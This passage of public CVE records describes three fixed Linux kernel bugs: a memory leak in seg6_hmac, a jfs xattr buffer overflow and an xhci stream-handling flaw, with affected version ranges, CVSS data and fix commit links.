              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            },
            {
              "lessThan": "efb9f4f19f8e37fde43dfecebc80292d179f56c6",
              "status": "affected",
              "version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/seg6_hmac.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: sr: fix memleak in seg6_hmac_init_algo\n\nseg6_hmac_init_algo returns without cleaning up the previous allocations\nif one fails, so it\u0027s going to leak all that memory and the crypto tfms.\n\nUpdate seg6_hmac_exit to only free the memory when allocated, so we can\nreuse the code directly."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:53.038Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/afd5730969aec960a2fee4e5ee839a6014643976"
        },
        {
          "url": "https://git.kernel.org/stable/c/4a3fcf53725b70010d1cf869a2ba549fed6b8fb3"
        },
        {
          "url": "https://git.kernel.org/stable/c/daf341e0a2318b813427d5a78788c86f4a7f02be"
        },
        {
          "url": "https://git.kernel.org/stable/c/61d31ac85b4572d11f8071855c0ccb4f32d76c0c"
        },
        {
          "url": "https://git.kernel.org/stable/c/599a5654215092ac22bfc453f4fd3959c55ea821"
        },
        {
          "url": "https://git.kernel.org/stable/c/0e44d6cbe8de983470c3d2f978649783384fdcb6"
        },
        {
          "url": "https://git.kernel.org/stable/c/f6a99ef4e056c20a138a95cc51332b2b96c8f383"
        },
        {
          "url": "https://git.kernel.org/stable/c/efb9f4f19f8e37fde43dfecebc80292d179f56c6"
        }
      ],
      "title": "ipv6: sr: fix memleak in seg6_hmac_init_algo",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39489",
    "datePublished": "2024-07-10T07:14:08.988Z",
    "dateReserved": "2024-06-25T14:23:23.747Z",
    "dateUpdated": "2025-05-04T09:16:53.038Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40902 (GCVE-0-2024-40902)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:20 – Updated: 2026-01-05 10:36

Title

jfs: xattr: fix buffer overflow for invalid xattr

Summary

In the Linux kernel, the following vulnerability has been resolved: jfs: xattr: fix buffer overflow for invalid xattr When an xattr size is not what is expected, it is printed out to the kernel log in hex format as a form of debugging. But when that xattr size is bigger than the expected size, printing it out can cause an access off the end of the buffer. Fix this all up by properly restricting the size of the debug hex dump in the kernel log.

Severity ?

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f0dedb5c511ed82cb…
	https://git.kernel.org/stable/c/1e84c9b1838152a87…
	https://git.kernel.org/stable/c/fc745f6e83cb650f9…
	https://git.kernel.org/stable/c/480e5bc21f2c42d90…
	https://git.kernel.org/stable/c/33aecc5799c93d3ee…
	https://git.kernel.org/stable/c/4598233d9748fe4db…
	https://git.kernel.org/stable/c/b537cb2f4c4a13574…
	https://git.kernel.org/stable/c/7c55b78818cfb7326…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f0dedb5c511ed82cbaff4997a8decf2351ba549f (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 1e84c9b1838152a87cf453270a5fa75c5037e83a (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < fc745f6e83cb650f9a5f2c864158e3a5ea76dad0 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 480e5bc21f2c42d90c2c16045d64d824dcdd5ec7 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 33aecc5799c93d3ee02f853cb94e201f9731f123 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 4598233d9748fe4db4e13b9f473588aa25e87d69 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < b537cb2f4c4a1357479716a9c339c0bda03d873f (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 7c55b78818cfb732680c4a72ab270cc2d2ee3d0f (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:57:30.293Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f0dedb5c511ed82cbaff4997a8decf2351ba549f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1e84c9b1838152a87cf453270a5fa75c5037e83a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fc745f6e83cb650f9a5f2c864158e3a5ea76dad0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/480e5bc21f2c42d90c2c16045d64d824dcdd5ec7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/33aecc5799c93d3ee02f853cb94e201f9731f123"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4598233d9748fe4db4e13b9f473588aa25e87d69"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b537cb2f4c4a1357479716a9c339c0bda03d873f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7c55b78818cfb732680c4a72ab270cc2d2ee3d0f"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unaffected",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "f0dedb5c511e",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "1e84c9b18381",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "fc745f6e83cb",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "480e5bc21f2c",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "33aecc5799c9",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "4598233d9748",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "b537cb2f4c4a",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              },
              {
                "lessThan": "7c55b78818cf",
                "status": "affected",
                "version": "1da177e4c3f4",
                "versionType": "git"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-40902",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-16T04:02:10.264268Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-121",
                "description": "CWE-121 Stack-based Buffer Overflow",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-20T14:03:35.925Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/jfs/xattr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f0dedb5c511ed82cbaff4997a8decf2351ba549f",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "1e84c9b1838152a87cf453270a5fa75c5037e83a",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "fc745f6e83cb650f9a5f2c864158e3a5ea76dad0",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "480e5bc21f2c42d90c2c16045d64d824dcdd5ec7",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "33aecc5799c93d3ee02f853cb94e201f9731f123",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "4598233d9748fe4db4e13b9f473588aa25e87d69",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "b537cb2f4c4a1357479716a9c339c0bda03d873f",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "7c55b78818cfb732680c4a72ab270cc2d2ee3d0f",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/jfs/xattr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: xattr: fix buffer overflow for invalid xattr\n\nWhen an xattr size is not what is expected, it is printed out to the\nkernel log in hex format as a form of debugging.  But when that xattr\nsize is bigger than the expected size, printing it out can cause an\naccess off the end of the buffer.\n\nFix this all up by properly restricting the size of the debug hex dump\nin the kernel log."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:49.134Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f0dedb5c511ed82cbaff4997a8decf2351ba549f"
        },
        {
          "url": "https://git.kernel.org/stable/c/1e84c9b1838152a87cf453270a5fa75c5037e83a"
        },
        {
          "url": "https://git.kernel.org/stable/c/fc745f6e83cb650f9a5f2c864158e3a5ea76dad0"
        },
        {
          "url": "https://git.kernel.org/stable/c/480e5bc21f2c42d90c2c16045d64d824dcdd5ec7"
        },
        {
          "url": "https://git.kernel.org/stable/c/33aecc5799c93d3ee02f853cb94e201f9731f123"
        },
        {
          "url": "https://git.kernel.org/stable/c/4598233d9748fe4db4e13b9f473588aa25e87d69"
        },
        {
          "url": "https://git.kernel.org/stable/c/b537cb2f4c4a1357479716a9c339c0bda03d873f"
        },
        {
          "url": "https://git.kernel.org/stable/c/7c55b78818cfb732680c4a72ab270cc2d2ee3d0f"
        }
      ],
      "title": "jfs: xattr: fix buffer overflow for invalid xattr",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40902",
    "datePublished": "2024-07-12T12:20:43.508Z",
    "dateReserved": "2024-07-12T12:17:45.579Z",
    "dateUpdated": "2026-01-05T10:36:49.134Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40927 (GCVE-0-2024-40927)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:25 – Updated: 2025-11-03 21:57

Title

xhci: Handle TD clearing for multiple streams case

Summary

In the Linux kernel, the following vulnerability has been resolved: xhci: Handle TD clearing for multiple streams case When multiple streams are in use, multiple TDs might be in flight when an endpoint is stopped. We need to issue a Set TR Dequeue Pointer for each, to ensure everything is reset properly and the caches cleared. Change the logic so that any N>1 TDs found active for different streams are deferred until after the first one is processed, calling xhci_invalidate_cancelled_tds() again from xhci_handle_cmd_set_deq() to queue another command until we are done with all of them. Also change the error/"should never happen" paths to ensure we at least clear any affected TDs, even if we can't issue a command to clear the hardware cache, and complain loudly with an xhci_warn() if this ever happens. This problem case dates back to commit e9df17eb1408 ("USB: xhci: Correct assumptions about number of rings per endpoint.") early on in the XHCI driver's life, when stream support was first added. It was then identified but not fixed nor made into a warning in commit 674f8438c121 ("xhci: split handling halted endpoints into two steps"), which added a FIXME comment for the problem case (without materially changing the behavior as far as I can tell, though the new logic made the problem more obvious). Then later, in commit 94f339147fc3 ("xhci: Fix failure to give back some cached cancelled URBs."), it was acknowledged again. [Mathias: commit 94f339147fc3 ("xhci: Fix failure to give back some cached cancelled URBs.") was a targeted regression fix to the previously mentioned patch. Users reported issues with usb stuck after unmounting/disconnecting UAS devices. This rolled back the TD clearing of multiple streams to its original state.] Apparently the commit author was aware of the problem (yet still chose to submit it): It was still mentioned as a FIXME, an xhci_dbg() was added to log the problem condition, and the remaining issue was mentioned in the commit description. The choice of making the log type xhci_dbg() for what is, at this point, a completely unhandled and known broken condition is puzzling and unfortunate, as it guarantees that no actual users would see the log in production, thereby making it nigh undebuggable (indeed, even if you turn on DEBUG, the message doesn't really hint at there being a problem at all). It took me *months* of random xHC crashes to finally find a reliable repro and be able to do a deep dive debug session, which could all have been avoided had this unhandled, broken condition been actually reported with a warning, as it should have been as a bug intentionally left in unfixed (never mind that it shouldn't have been left in at all). > Another fix to solve clearing the caches of all stream rings with > cancelled TDs is needed, but not as urgent. 3 years after that statement and 14 years after the original bug was introduced, I think it's finally time to fix it. And maybe next time let's not leave bugs unfixed (that are actually worse than the original bug), and let's actually get people to review kernel commits please. Fixes xHC crashes and IOMMU faults with UAS devices when handling errors/faults. Easiest repro is to use `hdparm` to mark an early sector (e.g. 1024) on a disk as bad, then `cat /dev/sdX > /dev/null` in a loop. At least in the case of JMicron controllers, the read errors end up having to cancel two TDs (for two queued requests to different streams) and the one that didn't get cleared properly ends up faulting the xHC entirely when it tries to access DMA pages that have since been unmapped, referred to by the stale TDs. This normally happens quickly (after two or three loops). After this fix, I left the `cat` in a loop running overnight and experienced no xHC failures, with all read errors recovered properly. Repro'd and tested on an Apple M1 Mac Mini (dwc3 host). On systems without an IOMMU, this bug would instead silently corrupt freed memory, making this a ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/26460c1afa311524f…
	https://git.kernel.org/stable/c/633f72cb6124ecda9…
	https://git.kernel.org/stable/c/949be4ec5835e0ccb…
	https://git.kernel.org/stable/c/61593dc413c3655e4…
	https://git.kernel.org/stable/c/5ceac4402f5d975e5…

Impacted products

Vendor

Product

Version

Linux

Affected: e9df17eb1408cfafa3d1844bfc7f22c7237b31b8 , < 26460c1afa311524f588e288a4941432f0de6228 (git)
Affected: e9df17eb1408cfafa3d1844bfc7f22c7237b31b8 , < 633f72cb6124ecda97b641fbc119340bd88d51a9 (git)
Affected: e9df17eb1408cfafa3d1844bfc7f22c7237b31b8 , < 949be4ec5835e0ccb3e2a8ab0e46179cb5512518 (git)
Affected: e9df17eb1408cfafa3d1844bfc7f22c7237b31b8 , < 61593dc413c3655e4328a351555235bc3089486a (git)
Affected: e9df17eb1408cfafa3d1844bfc7f22c7237b31b8 , < 5ceac4402f5d975e5a01c806438eb4e554771577 (git)

Linux

Affected: 2.6.35
Unaffected: 0 , < 2.6.35 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:57:55.158Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26460c1afa311524f588e288a4941432f0de6228"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/633f72cb6124ecda97b641fbc119340bd88d51a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/949be4ec5835e0ccb3e2a8ab0e46179cb5512518"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/61593dc413c3655e4328a351555235bc3089486a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5ceac4402f5d975e5a01c806438eb4e554771577"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40927",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:05:11.586761Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:03.177Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/host/xhci-ring.c",
            "drivers/usb/host/xhci.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "26460c1afa311524f588e288a4941432f0de6228",
              "status": "affected",
              "version": "e9df17eb1408cfafa3d1844bfc7f22c7237b31b8",
              "versionType": "git"
            },
            {
              "lessThan": "633f72cb6124ecda97b641fbc119340bd88d51a9",
              "status": "affected",
              "version": "e9df17eb1408cfafa3d1844bfc7f22c7237b31b8",
              "versionType": "git"
            },
            {
              "lessThan": "949be4ec5835e0ccb3e2a8ab0e46179cb5512518",
              "status": "affected",
              "version": "e9df17eb1408cfafa3d1844bfc7f22c7237b31b8",
              "versionType": "git"
            },
            {
              "lessThan": "61593dc413c3655e4328a351555235bc3089486a",
              "status": "affected",
              "version": "e9df17eb1408cfafa3d1844bfc7f22c7237b31b8",
              "versionType": "git"
            },
            {
              "lessThan": "5ceac4402f5d975e5a01c806438eb4e554771577",
              "status": "affected",
              "version": "e9df17eb1408cfafa3d1844bfc7f22c7237b31b8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/host/xhci-ring.c",
            "drivers/usb/host/xhci.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.35"
            },
            {
              "lessThan": "2.6.35",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxhci: Handle TD clearing for multiple streams case\n\nWhen multiple streams are in use, multiple TDs might be in flight when\nan endpoint is stopped. We need to issue a Set TR Dequeue Pointer for\neach, to ensure everything is reset properly and the caches cleared.\nChange the logic so that any N\u003e1 TDs found active for different streams\nare deferred until after the first one is processed, calling\nxhci_invalidate_cancelled_tds() again from xhci_handle_cmd_set_deq() to\nqueue another command until we are done with all of them. Also change\nthe error/\"should never happen\" paths to ensure we at least clear any\naffected TDs, even if we can\u0027t issue a command to clear the hardware\ncache, and complain loudly with an xhci_warn() if this ever happens.\n\nThis problem case dates back to commit e9df17eb1408 (\"USB: xhci: Correct\nassumptions about number of rings per endpoint.\") early on in the XHCI\ndriver\u0027s life, when stream support was first added.\nIt was then identified but not fixed nor made into a warning in commit\n674f8438c121 (\"xhci: split handling halted endpoints into two steps\"),\nwhich added a FIXME comment for the problem case (without materially\nchanging the behavior as far as I can tell, though the new logic made\nthe problem more obvious).\n\nThen later, in commit 94f339147fc3 